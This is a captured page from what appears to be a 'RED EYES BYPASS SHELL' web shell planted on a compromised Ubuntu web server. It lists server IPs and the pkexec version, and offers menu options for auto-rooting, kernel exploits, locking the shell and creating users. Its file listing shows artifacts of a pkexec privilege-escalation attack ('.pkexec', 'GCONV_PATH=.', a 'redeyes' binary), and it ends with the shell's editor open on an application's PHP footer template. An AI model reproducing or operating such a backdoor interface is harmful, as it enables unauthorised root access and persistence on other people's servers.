Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
template /
common /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
footer.html
986
B
-rwxr-xr-x
footerCommon.html
1.68
KB
-rwxr-xr-x
header.html
2.19
KB
-rwxr-xr-x
navbar.html
5.39
KB
-rwxr-xr-x
navbarShare.html
2.73
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
showTips.html
3.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footerCommon.html
<script type="text/javascript" src="<?php echo STATIC_PATH;?>js/lib/seajs/sea.js?ver=<?php echo KOD_VERSION;?>"></script> <?php //commonjs if(ST == 'share' || isset($GLOBALS['loadCommonJs'])){ if(isset($_GET['user'])){ $userInfo = '&user='.clear_html($_GET['user']).'&sid='.clear_html($_GET['sid']); }else{//login... $userInfo = ""; } echo '<script type="text/javascript" src="./index.php?share/commonJs&st='.ST.'&act='.ACT.$userInfo.'#id='.rand_string(4).'"></script>'; }else{ echo '<script type="text/javascript" src="./index.php?user/commonJs&st='.ST.'&act='.ACT.'#id='.rand_string(4).'"></script>'; } $settings = $GLOBALS['config']['settings']; $settingSystem = $GLOBALS['config']['settingSystem']; if(isset($settings['globalJs'])){ echo "\n ".'<script type="text/javascript" id="settings-global-js">'.$settings['globalJs'].'</script>'; } if(isset($settings['globalCss'])){ echo "\n ".'<style type="text/css" id="settings-global-css">'.$settings['globalCss'].'</style>'; } if(isset($settingSystem['globalCss'])){ echo "\n ".'<style type="text/css" id="setting-system-global-css">'.$settingSystem['globalCss'].'</style>'; } if(isset($settingSystem['globalHtml'])){ echo "\n ".$settingSystem['globalHtml']."\n"; } ?> <script type="text/javascript"> <?php if(defined('INSTALL_CHANNEL')){ echo "var installChannel='".INSTALL_CHANNEL."';\n"; } ?> seajs.config({ base: "<?php echo STATIC_PATH;?>js/", preload: ["lib/jquery-1.8.0.min"], map:[[/^(.*\.(?:css|js|html|htm|json|text))([\?|#].*)$/i,'$1$2?ver='+G.version]] }); if(navigator.serviceWorker){navigator.serviceWorker.register('./?share/manifestJS');} </script> <?php Hook::trigger('templateCommonFooter');?>
Close